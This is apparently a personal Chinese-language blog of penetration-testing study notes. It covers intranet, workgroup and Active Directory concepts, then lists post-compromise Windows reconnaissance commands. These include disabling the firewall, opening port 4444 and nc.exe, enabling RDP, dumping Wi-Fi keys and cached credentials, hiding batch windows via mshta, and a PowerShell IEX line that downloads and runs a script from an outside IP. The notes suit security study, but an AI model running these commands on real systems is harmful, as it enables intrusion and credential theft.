超算测试第一博客

自我介绍

姓名:许

性别:男

喜好:其实挺喜欢学技术的

自我评价:还行,吼吼

github:www.github.com/xudamu

下面是截取的另外的笔记

内网介绍

内部局域网,可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮箱和传真通信服务等

img

除了DMZ区一个web服务器或什么服务器上挖漏洞外,我们还可以,打印机、摄像头、路由器、智能电视?外来接入加入的路由器,通过流量劫持获取账号密码或者是强制分配IP都可以进入内网

钓鱼远控、提供路由器、攻击子公司、社工插U盘等都可以攻入内网

工作组介绍

按照不同职能对计算机进行分组

加入工作组

计算机属性中找到工作组,添加即可

img

img

创建工作组

退出工作组

img

把下面改掉即可,改成想要的,点击确定就能创建

访问工作组

点击即可

工作组的优缺点

优点:方便管理、资源分配灵活

缺点: 缺乏集中管理与控制的机制、没有集中的统一账户管理、只适合小规模用户使用

域介绍

解决上面工作组没有统一管理的缺陷,由域控制器管理域。连接域需要登录域的账号密码,而域的账号密码都在域控制器中

单域

通常在地理位置固定的小公司中,一个域就能满足需求,但是在一个域汇内,一般有两台域控制器,一台作为DC、另一台作为备份DC(域控制器)

同时一般来说DC和DNS会是同一台服务器,这种情况会比较多

父域和子域

第一个域就是父域,下面就是他的子域

域树

总个父域和子域就是域树

域森林

就是多个域树

搭建域环境

。。。

活动目录介绍

活动目录(AC/Active Directory AD)是指域环境中提供目录服务的组件

可以在user中添加想要的权限

img

域内权限介绍

这里后面都有描述的,直接将用户添加到相应的位置就可以

在创建用户的时候可以设置相关用户参数

账号集中管理:所有账号均存储在服务器中,方便执行命令和重置密码

软件集中管理:统一推送软件、安装网络打印机等、利用软件发布策略分发软件、可以让用户自由选择需要的软件

环境集中管理:统一客户端、iE、TCPP协议等设置。增强安全性:统一部署蛇毒软件和病毒扫描任务、集中管理用户的计算机权限、统一制定用户密码策略等、可以监控网络,对资料进行统一管理

更可靠,更短的宕机时间:例如,利用活动目录控制用户访问权限,利用群集、负载均衡等技术对文件服务器进行容灾设置。网络更可靠,宕机时间更短

活动目录是微软提供的统一管理基础平台,ISA、Exchange、SMS等都依赖这个平台

组里面还可以加组

img

创建组内的组来控制组内用户的管理权限

域内权限详细

组是用户账号的集合、通过向组分配权限,就可以不必向每个用户分别分配权限,方便管理

域本地

域本地成员来自林中任何域中的用户账号、全局组和通用组以及本域中的域本地组,在本域范围内可用,是权限的划分组

全局组

成员来自同一域的用户账户和全局组,在林范围内可用。是用户的集合组

通用组

来自于林中任意于中的用户账户、全局组和其他通用组,在全林范围内可用

DYJ为打印机

img

img

A-G-DL-P策略

指将用户账号添加到全局组中,将全局组添加到域本地组中,然后为域本地组分派资源权限

A表示用户账号(Account)

G表示全局组

U表示通用组

DL表示域本地组

P表示资源权限

安全域的划分

目的是将一组安全等级相同的计算机划入同一网段。该网段的计算机拥有相同的网络边界、并在网络边界上部署防火墙来实现对其他安全域的网络访问控制策略,从而对允许哪些IP地址访问此域、允许此域访问哪些IP地址和网段进行设置。这些措施将网络风险最小化,当攻击发生时,可尽可能将威胁隔离,从而降低对域内计算机的影响。

img

多层隔离

DMZ是放在公网上的,一般DMZ是不让访问内网的,防止DMZ的服务器被打崩当跳板跳入内网中

域中计算机分类

域控制器

用于管理所有网络访问,有所有的共享目录和资源。域控制器中存储了域内所有的账户和策略信息,包括安全策略、用户身份验证信息和账户信息

有多台计算机可以被指定为域控制器,以分据用光的登录、访问等操作,多个域控制器可以一起工作,自动备份用户账户和活动目录数据。这样及时部分域控制器瘫痪,访问也不会受到影响

成员服务器

成员服务器是指定安装了服务器操作系统并加入了域、但是没有安装活动目录的计算机,其主要任务是提供网络资源,成员服务器的类型通常由文件服务器、应用服务器、数据库服务器、web服务器、防火墙、远程访问服务器、打印服务器

客户机

域中计算机可以是安装了其他操作系统的计算机,用户利用这些计算机和域中的账户可以登录域。这些计算机被称为域中的客户机。域用户账号通过域的安全验证后,即可访问域中的各种资源

独立服务器

独立服务和域没有关系,如果服务器不加入域,也不安装活动目录,称为独立服务器。独立服务器可以创建工作组、与网络中其他计算机共享资源,但不用活动目录提供的任何服务

域控制器用于有放活动目录数据库,是域中必须要有的,而其他三种计算机则不要必须要有的,也就是说,最简单的域可以只包含一台计算机,这台计算机就是该域的域控制器。当然,域中各服务器的角色是可以改变的。例如,独立服务器既可以称为域控制器,也可以加入某个域成为成员服务器

内网信息收集

内网信息、本机信息、内网IP、内网端口、域信息、域内用户

建立在创建了内网权限后。上线CS或msf后

脚本

手动收集内网信息

1
2
3
ipconfig
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"名称" /C:"OS 版本"

查看系统体系结构

1
echo %PROCESSOR_ARCHITECTURE%

查看安装的软件以及版本

1
2
wmic product get name,version
powershell "Get-WmiObject -class win32_product | Select-Object name,version"

查看本机的服务

1
wmic service list brief

进程信息

1
2
tasklist
wmic process list brief

启动程序信息

1
wmic startup get command,caption

计划任务信息

1
2
schttasks /query /fo LIST /v
如果上面的命令显示无法载入列资源,那么输入:chcp 437

主机开机时间

1
net statistics workstation

查用户

1
2
net user
wmic useraccount get name ,SID

查会话

1
net session

查端口

1
netstat -ano

查补丁

1
wmic qfe get Caption,Description,HotFixID,Installedon

查看共享列表

1
2
net share //横向移动?
wmic share get name, path,status

查询路由信息

1
route print

查看防火墙是否开启

1
netsh firewall show state //虽然说netsh firewall已经过时了,改成了netsh advfirewall firewall show state无法执行

关闭防火墙

1
2
在windows2003前:netsh firewall set opmode disable
在windows2003之后:netsh firewall set opmode disable 或者 netsh advfirewall set allprofiles state off

查看防火墙配置

1
netsh firewall show config

修改防火墙配置

1
2
windowserver2003之前:netsh firewall add allowedprogram c:\nc.exe "allownc" enable //指定nc.exe能连接(出防火墙)
windowserver2003之后:netsh advfirewall firewall add rule name="pass nc"dir=in action=allow program="c:/nc.exe"

允许端口放行

1
netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow

img

允许端口进站

1
netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=4444#允许端口进站

允许端口出站

1
netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=4444#允许端口进站

允许程序入站

1
netsh advfirewall firewall add rule name=test dir=in action=allow program=c://a.exe

出站类似

开启远程服务

在2003机器上

1
wmic path win32_terminalservicesetting where (_CLASS !="") call setallowtsconnections 1

在server2008和server 2021

1
2
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t TEG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t TEG_DWORD /d 11111111 /f

查wifi密码

1
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

查看RDP(远程桌面协议)端口号

1
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v PortNumber

查代理信息

1
reg query "HKEY_CURRENT_USER\Software\Wicrosoft\Windows\CurrentVersion\Internet Settings"

查看登录凭证 //可能有人将管理凭证缓存,然后这里就能看到

1
cmdkey /list

查看arp信息,查看地址存活

1
arp -a

查看本机用户组

1
net localgroup

查看最近打开的文档

1
dir %APPDATA%\Microsoft\Windows\Recent

查看本机用户组(windows11家庭版好像只能这么干)

1
net localgroup

查看管理员组成员

1
net localgroup administrators

自动收集脚本

bat脚本

查一些信息

1
2
3
4
5
6
7
8
9
10
11
12
13
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A" 
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html 
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html 
wmic USERACCOUNT list full /format:"%var%" >> out.html 
wmic group list full /format:"%var%" >> out.html 
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html 
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html 
wmic netuse list full /format:"%var%" >> out.html 
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html 
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html 
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html 
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html 
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

查本机IP范围内可连的IP

1
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.45.%I | findstr "TTL="   //中间的(1,1,254),第一个是开头,254是结尾。中间的1是步长,可为负

Tips:

1
2
3
4
5
6
7
8
9
10
11
echo off //将后面多余的输出删去,不显示命令本身,不用一段一隔
echo on //一段一隔
pause //暂停,卡扣
@echo off //将第一行的命令输出也删掉
call C:\2.bat  //调用(运行并回显)C盘下面2.bat的内容
cmd命令后台运行
@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM

工具kscan会好用一点

fscan -t 192.168.45.0/24 –encoding gbk

暂时无法在飞书文档外展示此内容

另外端口扫描就是powersploit和redteamtool

powersploit

1
2
3
4
5
上传到靶机执行
powershell ‐exec bypass Import‐Module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

远程执行
powershell ‐exec bypass ‐c IEX (New‐ObjectSystem.Net.Webclient).DownloadString('http://118.178.134.226:8080/Invoke‐Portscan.ps1');import‐module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

Nishang

针对powershell的渗透工具,

类似的Invoke‐Portscan.ps1;

1
2
powershell -command "&{Invoke-PortScan -StartAdress 192.168.41.1 -EndAddress 192.168.41.21 -ResolveHost}"
powershell ‐command "& { import‐module .\nishang\nishang.psm1; Invoke‐PortScan ‐StartAddress 192.168.41.1 ‐EndAddress 192.168.41.255 -Ports 445 ‐ResolveHost }"

可以先导入模块在cs中,powershell-import +模块位置

然后直接使用就行